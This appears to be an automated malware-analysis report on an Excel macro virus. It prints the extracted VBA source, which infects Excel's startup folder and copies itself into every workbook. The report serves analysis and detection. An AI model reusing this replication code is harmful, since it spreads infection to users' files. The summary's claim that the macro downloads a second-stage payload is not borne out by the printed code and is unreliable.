Xls.Trojan.Import-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 9638fc6f43220c8b…

MALICIOUS

Office (OLE)

69.0 KB Created: 1997-09-11 13:21:10 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: f605ce99395f0db57633d9e1b87ff2e6 SHA-1: 7ed58effabbd53da8b04dce3e2601a318aeeca43 SHA-256: 9638fc6f43220c8b81af2d3caaf1b7622a84c0cb4d16fbbb071973d1f37ac674
180 Risk Score

Malware Insights

Xls.Trojan.Import-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel workbook containing a VBA macro with an Auto_Open subroutine, which is a common technique for executing malicious code upon opening. The macro attempts to initialize and activate a 'Replicator' object, suggesting it's designed to download and execute a second-stage payload. The ClamAV detection 'Xls.Trojan.Import-1' further confirms its malicious nature.

Heuristics 3

  • ClamAV: Xls.Trojan.Import-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Import-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12757 bytes
SHA-256: 962295669636efa067bfb2c22d8b9877ad182a1495c2f7c8809ce8ffd0361e53
Detection
ClamAV: Xls.Trojan.Import-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ArtiLife"
Option Explicit
Dim Replica As New Replicator

Sub Auto_Open()
    Set Replica.App = Application
    If ThisWorkbook.Path <> Application.StartupPath Then Replica.Initialize
    Application.OnTime TimeValue("16:00:00"), "DeliverPayload"
End Sub

Sub DeliverPayload()
    Replica.Activate
End Sub


Attribute VB_Name = "Replicator"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_Creatable = True
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public WithEvents App As Application
Private dpath As String

Private Sub App_WorkbookBeforeClose(ByVal Wb As Workbook, Cancel As Boolean)
    Dim infwb As String
    On Error Resume Next
    infwb = Wb.Name
    If Infchecker(infwb) = False Then Import infwb
End Sub

Private Sub App_WorkbookOpen(ByVal Wb As Workbook)
    Dim infwb As String
    On Error Resume Next
    infwb = Wb.Name
    If Wb.Path <> Application.StartupPath Then
        If Infchecker(infwb) = True Then Remove infwb
    End If
End Sub

Function Export(wkbk As String)
    dpath = Application.DefaultFilePath
    Workbooks(wkbk).VBProject.VBComponents("Artilife").Export (dpath & "\~a0183")
    Workbooks(wkbk).VBProject.VBComponents("Replicator").Export (dpath & "\~r0183")
End Function

Function Initialize()
    Dim curname As String
    Dim backgrounder As Object
    Dim stpath As String
    On Error Resume Next
    Application.ScreenUpdating = False
    curname = ThisWorkbook.Name
    stpath = Application.StartupPath
    Export curname
    Set backgrounder = Workbooks.Add
    backgrounder.IsAddin = True
    Import backgrounder.Name
    backgrounder.SaveAs (stpath & "\~xl.xla")
    Application.ScreenUpdating = True
End Function

Function Import(ByVal wkbk As String)
    dpath = Application.DefaultFilePath
    Workbooks(wkbk).VBProject.VBComponents.Import (dpath & "\~a0183")
    Workbooks(wkbk).VBProject.VBComponents.Import (dpath & "\~r0183")
End Function

Function Remove(wbname As String)
    Dim vbart As Object, vbrep As Object
    Set vbart = Workbooks(wbname).VBProject.VBComponents("Artilife")
    Set vbrep = Workbooks(wbname).VBProject.VBComponents("Replicator")
    Workbooks(wbname).VBProject.VBComponents.Remove vbart
    Workbooks(wbname).VBProject.VBComponents.Remove vbrep
End Function

Private Function Infchecker(wbname As String) As Boolean
    On Error Resume Next
    Dim vbp As Object
    Infchecker = False
    For Each vbp In Workbooks(wbname).VBProject.VBComponents
        If StrComp(vbp.Name, "Replicator", 0) = 0 Then
            Infchecker = True
            Exit For
        End If
    Next vbp
End Function

Function Activate()
    Dim msg(26) As String
    Dim i As Integer
        For i = 0 To 26
            msg(i) = Right("               The Phantom", i + 1)
            Application.StatusBar = msg(i)
                If 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.